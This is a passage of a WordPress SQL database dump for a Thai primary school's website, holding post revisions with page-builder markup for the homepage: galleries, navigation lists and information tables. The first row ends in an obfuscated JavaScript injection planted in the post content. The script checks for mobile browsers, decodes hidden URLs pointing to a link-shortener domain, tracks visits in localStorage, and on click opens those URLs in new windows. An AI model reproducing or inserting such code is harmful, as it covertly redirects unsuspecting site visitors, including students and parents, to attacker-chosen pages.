)|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','วิดีโอกิจกรรมโรงเรียน','','inherit','closed','closed','','292-revision-v1','','','2024-07-30 11:36:35','2024-07-30 04:36:35','',292,'http://pakhaeng.ssk.in.th/?p=295',0,'revision','',0),
(297,1,'2024-07-30 11:46:38','2024-07-30 04:46:38','<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_b8ea4f-02\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_235c2e-aa\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_235c2e-aa\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"67990d4f\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e53f332c\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingBottom\":\"10px\"}} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"f2a87680\",\"mediaId\":23,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-f2a87680\"><img class=\"gb-image gb-image-f2a87680\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/โรงเรียนบ้านโคกสะอาด.png\" alt=\"โรงเรียนบ้านหนองปลาเข็ง-กอไหล่\" title=\"โรงเรียนบ้านหนองปลาเข็ง-กอไหล่\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"ff644ddb\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_f7576b-fd\",\"columns\":[4,4,4,3,2,2],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":30,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/ผอ-1.png\" alt=\"\" title=\"ผอ 1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"14_bc537f-5a\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns14_bc537f-5a\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"14_1da0eb-4e\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\",\"sizePreset\":\"small\",\"background\":\"#0a71ad\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#0a71ad\",\"backgroundColorHover\":\"#8ed1fc\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"14_add57c-9d\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items14_add57c-9d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"14_745a05-5a\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_745a05-5a\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลพื้นฐาน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_1e894c-db\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_1e894c-db\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ประวัติโรงเรียน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_3cdb23-c1\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_3cdb23-c1\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_92a3d1-5f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_92a3d1-5f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">กรรมการสถานศึกษา</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_225b86-42\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_225b86-42\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลผู้บริหาร</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_e92ee9-59\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_e92ee9-59\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลบุคลากร</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_91c788-64\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_91c788-64\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลนักเรียน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_5a5d38-a9\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_5a5d38-a9\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูล O-NET</span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e5e0c341\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"9l7bo6vn\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"showTaxonomy\":false,\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"showPagination\":true,\"postsPerPage\":\"2\",\"headingText\":\"วิดีโอกิจกรรมโรงเรียน\",\"headingStyle\":\"heading5\",\"headingHide\":false,\"category-terms\":[{\"label\":\"วิดีโอกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%a7%e0%b8%b4%e0%b8%94%e0%b8%b5%e0%b9%82%e0%b8%ad%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}]} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showThumbnail\":false,\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"meta-fieldsMargin\":{\"md\":{\"top\":\"-10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"meta-fieldsPadding\":{\"md\":{\"top\":\"-10\",\"bottom\":\"-10\"}},\"headingBgColor\":\"#6096b4\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":20},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"titlePadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"titleBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"readmoreBgColor\":\"#6096b4\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>โครงสร้าง</strong></td></tr><tr><td><strong>ข้อมูลผู้บริหาร</strong></td></tr><tr><td><strong>อำนาจหน้าที่</strong></td></tr><tr><td><strong>ข้อมูลการติดต่อ</strong></td></tr><tr><td><strong>ข่าวประชาสัมพันธ์</strong></td></tr><tr><td><strong>Q&amp;A</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</strong></td></tr><tr><td><strong>แผนและความก้าวหน้าในการดำเนินงานและการใช้จ่ายงบประมาณประจำปี</strong></td></tr><tr><td><strong>รายงานผลการดำเนินงานประจำปี</strong></td></tr><tr><td><strong>คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</strong></td></tr><tr><td><strong>คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติการให้บริการ</strong></td></tr><tr><td><strong>E-Service</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table 